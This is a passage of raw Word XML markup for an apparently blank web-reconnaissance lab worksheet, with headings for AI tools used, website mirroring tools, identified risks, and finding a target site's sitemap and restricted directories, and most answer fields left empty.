              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2857" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0D8D2739" w14:textId="0CB1F442" w:rsidR="000340A3" w:rsidRPr="003A73CF" w:rsidRDefault="000340A3" w:rsidP="0032770D">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/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Others (If any)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B26631C" w14:textId="77777777" w:rsidR="000340A3" w:rsidRDefault="000340A3" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C2FDD" w14:paraId="4054ECDD" w14:textId="77777777" w:rsidTr="0032770D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="59BB0CB2" w14:textId="644B80ED" w:rsidR="002C2FDD" w:rsidRPr="00310D3A" w:rsidRDefault="002C2FDD" w:rsidP="0032770D">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008B458B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">AI-Based </w:t>
            </w:r>
            <w:r w:rsidR="00710E80" w:rsidRPr="00710E80">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Automation &amp; Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2857" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="77E2EAD1" w14:textId="77777777" w:rsidR="002C2FDD" w:rsidRPr="00C54B08" w:rsidRDefault="002C2FDD" w:rsidP="0032770D">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C54B08">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>AI Tools Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5757522E" w14:textId="77777777" w:rsidR="002C2FDD" w:rsidRPr="008B458B" w:rsidRDefault="002C2FDD" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008B458B">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>[*PentestGPT, Custom AI Scripts, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BF88B19" w14:textId="77777777" w:rsidR="002C2FDD" w:rsidRDefault="002C2FDD" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="18FD1680" w14:textId="77777777" w:rsidR="002C2FDD" w:rsidRDefault="002C2FDD" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C2FDD" w14:paraId="1B0BDB6F" w14:textId="77777777" w:rsidTr="0032770D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="150FB540" w14:textId="77777777" w:rsidR="002C2FDD" w:rsidRDefault="002C2FDD" w:rsidP="0032770D">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2857" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="16A91F5C" w14:textId="2DC3FF57" w:rsidR="002C2FDD" w:rsidRPr="00C54B08" w:rsidRDefault="002C2FDD" w:rsidP="0032770D">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C54B08">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Scripts or Prompts Used for Automation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7124CE5B" w14:textId="77777777" w:rsidR="002C2FDD" w:rsidRDefault="002C2FDD" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2C0D7345" w14:textId="77777777" w:rsidR="002C2FDD" w:rsidRDefault="002C2FDD" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C2FDD" w14:paraId="74276CA8" w14:textId="77777777" w:rsidTr="0032770D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="30EE0219" w14:textId="77777777" w:rsidR="002C2FDD" w:rsidRDefault="002C2FDD" w:rsidP="0032770D">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2857" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="35D34B94" w14:textId="2BAD151F" w:rsidR="002C2FDD" w:rsidRPr="00C54B08" w:rsidRDefault="0036744E" w:rsidP="0032770D">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0036744E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Saved Mirrored Pages for Offline Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60185AE2" w14:textId="77777777" w:rsidR="002C2FDD" w:rsidRDefault="002C2FDD" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="21638657" w14:textId="77777777" w:rsidR="002C2FDD" w:rsidRDefault="002C2FDD" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="02258336" w14:textId="77777777" w:rsidR="002C2FDD" w:rsidRDefault="002C2FDD" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C2FDD" w14:paraId="48F97336" w14:textId="77777777" w:rsidTr="0032770D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0BAE8A9B" w14:textId="6A7DB1EE" w:rsidR="002C2FDD" w:rsidRPr="00FE01D5" w:rsidRDefault="001A5D16" w:rsidP="0032770D">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A5D16">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Potential Security Risks Identified</w:t>
            </w:r>
            <w:r w:rsidR="002C2FDD" w:rsidRPr="00A1782B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7532" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="420806CB" w14:textId="208F95E6" w:rsidR="002C2FDD" w:rsidRPr="00C54B08" w:rsidRDefault="001A5D16" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60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[*</w:t>
            </w:r>
            <w:r w:rsidRPr="001A5D16">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Directory traversal, data exposure, etc.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A5D16" w14:paraId="5175111F" w14:textId="77777777" w:rsidTr="0032770D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3875731D" w14:textId="194F89B4" w:rsidR="001A5D16" w:rsidRPr="001A5D16" w:rsidRDefault="003225CC" w:rsidP="0032770D">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003225CC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Tool</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>/ Services</w:t>
            </w:r>
            <w:r w:rsidRPr="003225CC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7532" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="2EC8D95C" w14:textId="77777777" w:rsidR="001A5D16" w:rsidRDefault="003225CC" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60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[*</w:t>
            </w:r>
            <w:r w:rsidRPr="003225CC">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>wget, HTTrack, Cyotek WebCopy, etc.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FE97606" w14:textId="77777777" w:rsidR="007F7D67" w:rsidRDefault="007F7D67" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1F598795" w14:textId="77777777" w:rsidR="007F7D67" w:rsidRDefault="007F7D67" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1D52C2A4" w14:textId="77777777" w:rsidR="007F7D67" w:rsidRDefault="007F7D67" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5F4F1120" w14:textId="77777777" w:rsidR="007F7D67" w:rsidRDefault="007F7D67" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="73BDC45B" w14:textId="77777777" w:rsidR="007F7D67" w:rsidRDefault="007F7D67" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0CCDE273" w14:textId="7F9BF6ED" w:rsidR="007F7D67" w:rsidRDefault="007F7D67" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3119F34C" w14:textId="77777777" w:rsidR="00F15654" w:rsidRPr="00A51A96" w:rsidRDefault="00F15654" w:rsidP="00F15654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5654" w14:paraId="22C6E870" w14:textId="77777777" w:rsidTr="003A1680">
        <w:trPr>
          <w:trHeight w:val="3725"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B977098" w14:textId="77777777" w:rsidR="00F15654" w:rsidRDefault="00F15654" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0BC743B9" w14:textId="77777777" w:rsidR="00F15654" w:rsidRDefault="00F15654" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="767DD523" w14:textId="77777777" w:rsidR="00F15654" w:rsidRDefault="00F15654" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5466A41D" w14:textId="77777777" w:rsidR="00F15654" w:rsidRDefault="00F15654" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="00B2C4E1" w14:textId="77777777" w:rsidR="00F15654" w:rsidRDefault="00F15654" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0D2E5C10" w14:textId="77777777" w:rsidR="00F15654" w:rsidRDefault="00F15654" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="271D3EEB" w14:textId="77777777" w:rsidR="00D42444" w:rsidRDefault="00D42444" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="28ED10E8" w14:textId="77777777" w:rsidR="00D42444" w:rsidRDefault="00D42444" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="240B49B4" w14:textId="77777777" w:rsidR="00D42444" w:rsidRDefault="00D42444" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="769E6F46" w14:textId="77777777" w:rsidR="00D42444" w:rsidRDefault="00D42444" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6537A522" w14:textId="77B94D71" w:rsidR="00D42444" w:rsidRDefault="00D42444" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="31F82FDF" w14:textId="77777777" w:rsidR="0085288B" w:rsidRDefault="0085288B" w:rsidP="000947B4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CC4282" w:rsidRPr="000F3EF2" w14:paraId="1EB84186" w14:textId="77777777" w:rsidTr="00905652">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9230" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6C128D01" w14:textId="0DFEC315" w:rsidR="00CC4282" w:rsidRPr="000F3EF2" w:rsidRDefault="00CC4282" w:rsidP="008519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1.9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271750" w:rsidRPr="00271750">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">Identify the Sitemap of </w:t>
            </w:r>
            <w:r w:rsidR="001735B8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">the </w:t>
            </w:r>
            <w:r w:rsidR="00271750" w:rsidRPr="00271750">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Target Website</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4414C691" w14:textId="77777777" w:rsidR="00CC4282" w:rsidRPr="002E3021" w:rsidRDefault="00CC4282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232B17" w:rsidRPr="00232B17" w14:paraId="7A621EED" w14:textId="77777777" w:rsidTr="00F70BC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E7A2A29" w14:textId="77777777" w:rsidR="00232B17" w:rsidRPr="00232B17" w:rsidRDefault="00232B17" w:rsidP="00F70BC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32B17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0FB052B8" w14:textId="77777777" w:rsidR="00232B17" w:rsidRPr="00232B17" w:rsidRDefault="00232B17" w:rsidP="00232B1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32B17" w:rsidRPr="00232B17" w14:paraId="2591949D" w14:textId="77777777" w:rsidTr="00F70BC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149723F" w14:textId="77777777" w:rsidR="00232B17" w:rsidRPr="00232B17" w:rsidRDefault="00232B17" w:rsidP="00F70BC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32B17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19B09003" w14:textId="77777777" w:rsidR="00232B17" w:rsidRPr="00232B17" w:rsidRDefault="00232B17" w:rsidP="00232B1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32B17" w:rsidRPr="00232B17" w14:paraId="66B275BD" w14:textId="77777777" w:rsidTr="00F70BC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CFF167D" w14:textId="77777777" w:rsidR="00232B17" w:rsidRPr="00232B17" w:rsidRDefault="00232B17" w:rsidP="00F70BC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32B17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shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="410E8FE1" w14:textId="77777777" w:rsidR="00232B17" w:rsidRPr="00232B17" w:rsidRDefault="00232B17" w:rsidP="00232B1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32B17" w:rsidRPr="00232B17" w14:paraId="78336A57" w14:textId="77777777" w:rsidTr="00F70BC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75BCD0B" w14:textId="77777777" w:rsidR="00232B17" w:rsidRPr="00232B17" w:rsidRDefault="00232B17" w:rsidP="00F70BC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32B17">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Sitemap File of the Target Website</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E6EC3A4" w14:textId="77777777" w:rsidR="00232B17" w:rsidRDefault="00232B17" w:rsidP="00232B1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7A76360" w14:textId="77777777" w:rsidR="00FF193F" w:rsidRDefault="00FF193F" w:rsidP="00232B1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7D602BA" w14:textId="77777777" w:rsidR="00C47F74" w:rsidRPr="00232B17" w:rsidRDefault="00C47F74" w:rsidP="00232B1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32B17" w:rsidRPr="00232B17" w14:paraId="3D741414" w14:textId="77777777" w:rsidTr="00F70BC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7838476" w14:textId="77777777" w:rsidR="00232B17" w:rsidRPr="00232B17" w:rsidRDefault="00232B17" w:rsidP="00F70BC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32B17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Information collected </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B7DA29F" w14:textId="77777777" w:rsidR="00232B17" w:rsidRPr="00232B17" w:rsidRDefault="00232B17" w:rsidP="00843567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DD47BFC" w14:textId="77777777" w:rsidR="00232B17" w:rsidRPr="00232B17" w:rsidRDefault="00232B17" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1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BA564AA" w14:textId="77777777" w:rsidR="00232B17" w:rsidRPr="00232B17" w:rsidRDefault="00232B17" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1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31399BC" w14:textId="77777777" w:rsidR="00232B17" w:rsidRPr="00232B17" w:rsidRDefault="00232B17" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1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1FDA22E" w14:textId="77777777" w:rsidR="00232B17" w:rsidRPr="00232B17" w:rsidRDefault="00232B17" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1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A43933A" w14:textId="77777777" w:rsidR="00232B17" w:rsidRPr="00232B17" w:rsidRDefault="00232B17" w:rsidP="00232B1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32B17" w:rsidRPr="00232B17" w14:paraId="1E8FB3B8" w14:textId="77777777" w:rsidTr="00F70BC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9330E58" w14:textId="77777777" w:rsidR="00232B17" w:rsidRPr="00232B17" w:rsidRDefault="00232B17" w:rsidP="00F70BC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32B17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26BA1FF6" w14:textId="77777777" w:rsidR="00232B17" w:rsidRPr="00232B17" w:rsidRDefault="00232B17" w:rsidP="00843567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D68D99D" w14:textId="77777777" w:rsidR="00232B17" w:rsidRPr="00232B17" w:rsidRDefault="00232B17" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1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A712D2F" w14:textId="77777777" w:rsidR="00232B17" w:rsidRPr="00232B17" w:rsidRDefault="00232B17" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1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2DF330C" w14:textId="77777777" w:rsidR="00232B17" w:rsidRPr="00232B17" w:rsidRDefault="00232B17" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1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7B63E6E" w14:textId="77777777" w:rsidR="00232B17" w:rsidRPr="00232B17" w:rsidRDefault="00232B17" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1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585F188" w14:textId="77777777" w:rsidR="00232B17" w:rsidRPr="00232B17" w:rsidRDefault="00232B17" w:rsidP="00232B1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56AD2EBF" w14:textId="77777777" w:rsidR="009217FC" w:rsidRPr="00A51A96" w:rsidRDefault="009217FC" w:rsidP="009217FC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17FC" w14:paraId="502C54AA" w14:textId="77777777" w:rsidTr="002E3021">
        <w:trPr>
          <w:trHeight w:val="3698"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CE736DE" w14:textId="77777777" w:rsidR="009217FC" w:rsidRDefault="009217FC" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D30C88D" w14:textId="77777777" w:rsidR="009217FC" w:rsidRDefault="009217FC" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="338AA443" w14:textId="77777777" w:rsidR="009217FC" w:rsidRDefault="009217FC" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="68CC6C6A" w14:textId="77777777" w:rsidR="009217FC" w:rsidRDefault="009217FC" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="056802B1" w14:textId="77777777" w:rsidR="009217FC" w:rsidRDefault="009217FC" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="19266AAA" w14:textId="77777777" w:rsidR="009217FC" w:rsidRDefault="009217FC" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2F840166" w14:textId="77777777" w:rsidR="00905652" w:rsidRDefault="00905652" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="21AD5EB2" w14:textId="77777777" w:rsidR="00905652" w:rsidRDefault="00905652" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="023BEE29" w14:textId="77777777" w:rsidR="00905652" w:rsidRDefault="00905652" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="41569DDC" w14:textId="77777777" w:rsidR="00271750" w:rsidRDefault="00271750" w:rsidP="000947B4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6E0018" w:rsidRPr="000F3EF2" w14:paraId="5C6BB628" w14:textId="77777777" w:rsidTr="00905652">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9230" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="71C2E22C" w14:textId="4FEBEA19" w:rsidR="006E0018" w:rsidRPr="000F3EF2" w:rsidRDefault="006E0018" w:rsidP="008519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  <w:bookmarkStart w:id="0" w:name="_Hlk189056823"/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1.10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6C0EBA" w:rsidRPr="006C0EBA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Identify the Restricted Directories that Web Crawlers cannot Find</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="0"/>
    </w:tbl>
    <w:p w14:paraId="240E11FF" w14:textId="77777777" w:rsidR="009217FC" w:rsidRPr="00F70BCC" w:rsidRDefault="009217FC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230" w:type="dxa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373"/>
      </w:tblGrid>
      <w:tr w:rsidR="0028310D" w:rsidRPr="0028310D" w14:paraId="6434C260" w14:textId="77777777" w:rsidTr="0035479D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2354" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="62D84B66" w14:textId="77777777" w:rsidR="0028310D" w:rsidRPr="0028310D" w:rsidRDefault="0028310D" w:rsidP="0035479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8310D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876" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1ED172FB" w14:textId="77777777" w:rsidR="0028310D" w:rsidRPr="0028310D" w:rsidRDefault="0028310D" w:rsidP="0028310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8310D" w:rsidRPr="0028310D" w14:paraId="16082DCA" w14:textId="77777777" w:rsidTr="0035479D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2354" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5711C9BF" w14:textId="77777777" w:rsidR="0028310D" w:rsidRPr="0028310D" w:rsidRDefault="0028310D" w:rsidP="0035479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8310D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876" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60757B4D" w14:textId="77777777" w:rsidR="0028310D" w:rsidRPr="0028310D" w:rsidRDefault="0028310D" w:rsidP="0028310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8310D" w:rsidRPr="0028310D" w14:paraId="77C8E2A8" w14:textId="77777777" w:rsidTr="0035479D">
        <w:tc>
          <w:tcPr>
